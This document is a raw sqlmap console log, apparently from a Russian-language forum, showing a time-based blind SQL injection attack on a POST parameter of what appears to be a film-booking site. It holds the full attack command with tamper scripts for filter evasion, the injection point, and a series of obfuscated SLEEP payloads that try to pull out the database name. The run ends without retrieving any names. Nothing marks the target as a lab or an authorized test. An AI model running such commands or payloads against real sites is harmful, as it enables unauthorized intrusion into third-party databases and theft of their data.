sqlmap --level 5 --risk 3 --random-agent --threads 1 --url "
Ссылка скрыта от гостей
" --batch --time-sec=400 -v 3 --hex --data="arr[hours]=19&arr[id_film]=10166*&arr[minutes]=44&
method=1.32" --tamper=space2comment,randomcase --dbs
[*] starting @ 13:04:44 /2021-03-07/
[13:04:44] [DEBUG] cleaning up configuration parameters
[13:04:45] [INFO] loading tamper module 'space2comment'
[13:04:45] [INFO] loading tamper module 'randomcase'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[13:04:45] [DEBUG] used the default behavior, running in batch mode
[13:04:45] [INFO] loading tamper module 'space2dash'
[13:04:45] [DEBUG] setting the HTTP timeout
[13:04:45] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (Windows NT 5.0; U; en)' from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [DEBUG] creating HTTP requests opener object
[13:04:46] [DEBUG] setting the HTTP Referer header to the target URL
[13:04:46] [DEBUG] setting the HTTP Host header to the target URL
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[13:04:46] [DEBUG] used the default behavior, running in batch mode
[13:04:47] [INFO] resuming back-end DBMS 'mysql'
[13:04:47] [DEBUG] resolving hostname 'site.su'
[13:04:48] [INFO] testing connection to the target URL
[13:04:52] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: arr[hours]=19&arr[id_film]=10166' AND SLEEP(400) AND 'kNCw'='kNCw&arr[minutes]=44&method=1.32
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:04:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.16.1, PHP 7.3.16
back-end DBMS: MySQL >= 5.0.12
[13:04:52] [INFO] fetching database names
[13:04:52] [INFO] fetching number of databases
[13:04:52] [PAYLOAD] 10166
[13:04:53] [INFO] resumed: ?\xff
[13:04:53] [DEBUG] performed 0 queries in 0.03 seconds
[13:04:53] [ERROR] unable to retrieve the number of databases
[13:04:53] [INFO] falling back to current database
[13:04:53] [INFO] fetching current database
[13:04:53] [PAYLOAD] 10166'/**/aND/**/7166=If((orD(Mid((heX(IfNULL(cAsT(DAtABAsE()/**/As/**/CHaR),0x20))),1,1))>66),SLEEp(400),7166)/**/aND/**/'TrEu'='TrEu
[13:04:53] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[13:05:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:05:21] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRd(MId((HeX(iFNULL(caSt(DATAbAsE()/**/aS/**/chAR),0x20))),1,1))>52),sLEEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:05:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:05:51] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(CAst(DAtAbAse()/**/As/**/ChaR),0x20))),1,1))>56),sleEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:06:22] [PAYLOAD] 10166'/**/And/**/7166=iF((oRD(mID((Hex(iFNULL(caST(daTabaSe()/**/As/**/CHaR),0x20))),1,1))>64),slEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:06:54] [PAYLOAD] 10166'/**/aNd/**/7166=iF((orD(miD((hEX(iFNULL(CAsT(daTAbase()/**/aS/**/ChaR),0x20))),1,1))>65),SleEp(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:07:24] [PAYLOAD] 10166'/**/aND/**/7166=iF((Ord(Mid((hEx(iFNULL(caSt(daTABaSE()/**/aS/**/Char),0x20))),1,1))!=66),SleeP(400),7166)/**/aND/**/'TrEu'='TrEu
[13:07:58] [ERROR] invalid character detected. retrying..
[13:07:58] [PAYLOAD] 10166'/**/aNd/**/7166=iF((Ord(MId((Hex(iFNULL(CAst(DatAbaSE()/**/aS/**/cHAR),0x20))),1,1))>66),SleEP(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:08:32] [PAYLOAD] 10166'/**/And/**/7166=iF((ORd(mId((Hex(iFNULL(cAst(databaSE()/**/As/**/cHAr),0x20))),1,1))>97),sLEEp(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:12] [PAYLOAD] 10166'/**/And/**/7166=If((Ord(MiD((heX(IfNULL(CAst(DataBAsE()/**/As/**/ChAR),0x20))),1,1))>101),SlEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:43] [PAYLOAD] 10166'/**/And/**/7166=If((oRd(MId((hEx(IfNULL(casT(dAtabAse()/**/As/**/cHAR),0x20))),1,1))>119),slEEP(400),7166)/**/And/**/'TrEu'='TrEu
[13:10:14] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(caST(dAtABasE()/**/aS/**/ChAr),0x20))),1,1))>120),sLeEP(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:10:44] [INFO] retrieved:
[13:10:44] [DEBUG] performed 11 queries in 351.53 seconds
[13:10:44] [CRITICAL] unable to retrieve the database names
[*] ending @ 13:10:44 /2021-03-07/
